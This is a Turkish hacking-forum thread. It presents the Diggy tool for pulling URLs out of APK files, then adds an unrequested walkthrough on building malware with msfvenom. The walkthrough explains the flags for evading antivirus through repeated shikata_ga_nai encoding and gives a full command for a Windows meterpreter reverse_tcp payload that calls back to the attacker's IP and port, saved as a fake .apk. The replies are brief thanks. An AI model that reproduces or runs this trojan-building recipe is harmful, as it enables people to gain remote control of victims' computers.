İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Apk Dosyaların da ki Linkleri Görme/ Diggy Nedir?/ Stajyer Asistan Kulubu

10-06-2018 15:30
#1
XQ1 - ait Kullanıcı Resmi (Avatar)
XQ1
Üye
Üyelik tarihi:
03/2018
Mesajlar:
409
Teşekkür (Etti):
270
Teşekkür (Aldı):
119
Konular:
68
Gün geçtikçe virüslü reklam sayısı artıyor. Bazen reklamlar ilgimizi çekip basabiliyoruz ancak virüslü mü, virüssüz mü
olduğunu bilmiyoruz. Size anlatacağım Diggy programı reklam linklerini görmeye yaracaktır.
(tek reklam linki değil
başka linkler de dahil)


Öncelikle size Diggy' i tanıtayım

Diggy programı kısaca apkların içindeki linkleri (URL) yakalamaya yarar.


Kullanımı oldukça basittir. Hemen anlayacağınıza inanıyorum.



Dosyalarımızı GitHub' dan çekelim

Kod:
git clone https://github.com/UltimateHackers/Diggy


Çektikten sonra klasöre gidelim

Kod:
cd Diggy


Programa yetki verelim

Kod:
chmod +x install.sh


Programı kuralım

Kod:
./install.sh

Program kurulumu bu kadar. Şimdi zararlı bir apk oluşturalım.



Alıntı:
Zararlı Apk nasıl oluşturulur?

Konum dışında ancak yine de yazmak istedim. Uç birimi açınız.

Kod:
msfvenom -h

komutunu yazdıktan sonra karşınıza parametler çıkacaktır. Bunlar virüsünüze ekliyeceğiniz özelliklerdir.Hemen onları size tanıtayım
:

-p : (Payload) Oluşturulan zararlı dosya açıldıktan sonra çalışan kod parçası
-e : (Encoder) Oluşturulan zararlı dosyayı antivirüslere yakalanmaması için şifreleyen araç seçiminin yapıldığı parametre
-i : (İterations) Oluşturulan zararlı dosyayı kaç defa şifreyeleceğini seçeceğimiz parametre
-b : (Bad Chars) Oluşturulan zararlı dosyanın çalışabilmesi için çıkaracağımız kötü karakterleri yazdığımız parametre
-f : (Format) Oluşturulan zararlı dosyayı hangi formatta kaydeceğimizi belirlediğimiz parametre
-a : (Architecture) Oluşturulan zararlı dosyanın hangi mimaride çalışacağını verdiğimiz parametre
[COLOR="red"]--platform :[/COLOR]Oluşturulan zararlı dosyanın hangi işletim sisteminde çalışacağını verdiğimiz parametre
Ben parametrelere şunları vereceğim.


-p : windows/meterpreter/reverse_tcp ( Kurbandan bağlantı almama yarayacak payload )
-e : x86/shikata_ga_nai ( Oluşturacağım zararlı dosyayı encode etmemi yarayacak encoder )
-i : 5 ( 5 defa encode etmesini istiyorum )
-b : \x00 ( Kötü karakteri çıkarıyorum )
-f : .exe ( Uygulama olarak kaydedeceğim)
-a : x86 ( 32 bitlik işletim sisteminde çalışmasını istiyorum )
--platform : windows ( Windows işletim sisteminde çalışmasını istiyorum )
LHOST : Kendi İp adresinizi yazın
LPORT : Hangi portu kullanmak istiyorsanız o portu yazın



Peki bunları nasıl kullanacağız?

Kod:
msfvenom -p windows/meterpreter/reverse_tcp  -e x86/shikata_ga_nai -i 5 -a x86 --platform windows LHOST=192.168.1.5 LPORT=443 -f exe  >  virüs.apk
Sonuna exe veya apk uzantısı ekliyebilirsiniz sonuçta amaç virüslü dosya yaratmak.


Şimdi gelelim dosyayı Taratmaya


Uç birimi açınız

Kod:
diggy + apk nın konumu + apk ismi
Şöyle olucak

Kod:
diggy Masaüstü/virüs.apk
Diggy, dosyayı tarayıp " root/Diggy " klasörüne kaydedecektir.


Bu sayede linkler virüslü olup olmadığını virüs totale taratak karar verebilirsiniz.





----> RESİMLİ ANLATIM <----






























Alabileceğiniz Hatalar


Program açılmıyor?


--> Dosyaların tam şekilde indiğinden emin olun

--> Önce yetki verin sonra kurun.



Text Dosyası Yok

--> Java sürümünüzü kontrol edin yoksa java programını temin edip kurun.


Kaynak

Kullanıcı İmzası
Aşksız ve paramparçaydı yaşam
Bir inancın yüceliğinde buldum seni
Bir kavganın güzelliğinde sevdim
Bitmedi daha sürüyor o kavga ve sürecek
Yeryüzü aşkın yüzü oluncaya dek!

ergenüs.club

RAM_Hacker Teşekkür etti.

10-06-2018 15:33
#2
4UR0R4 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2018
Nereden:
T.C
Mesajlar:
666
Teşekkür (Etti):
125
Teşekkür (Aldı):
145
Konular:
72
Eline Sağlik Fakat Resimleri Kodlarin Altina Koysaydın Resimleri Daha Güzel Olur
Kullanıcı İmzası
Tarihini bilmeyen millet yok olmaya mahkumdur….
Mustafa Kemal AtaTÜRK


Sayilmayiz Parmakla Ölmeyiz Vurulmakla...
10-06-2018 15:34
#3
XEmareX - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2018
Nereden:
Amerika
Mesajlar:
1.405
Teşekkür (Etti):
56
Teşekkür (Aldı):
98
Konular:
52
eline saglik da baya karisik ;D
XQ1 Teşekkür etti.
12-06-2018 23:58
#4
Üyelik tarihi:
03/2016
Nereden:
pardus@root
Mesajlar:
2.963
Teşekkür (Etti):
771
Teşekkür (Aldı):
699
Konular:
238
Ellerine sağlık.
Kullanıcı İmzası

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı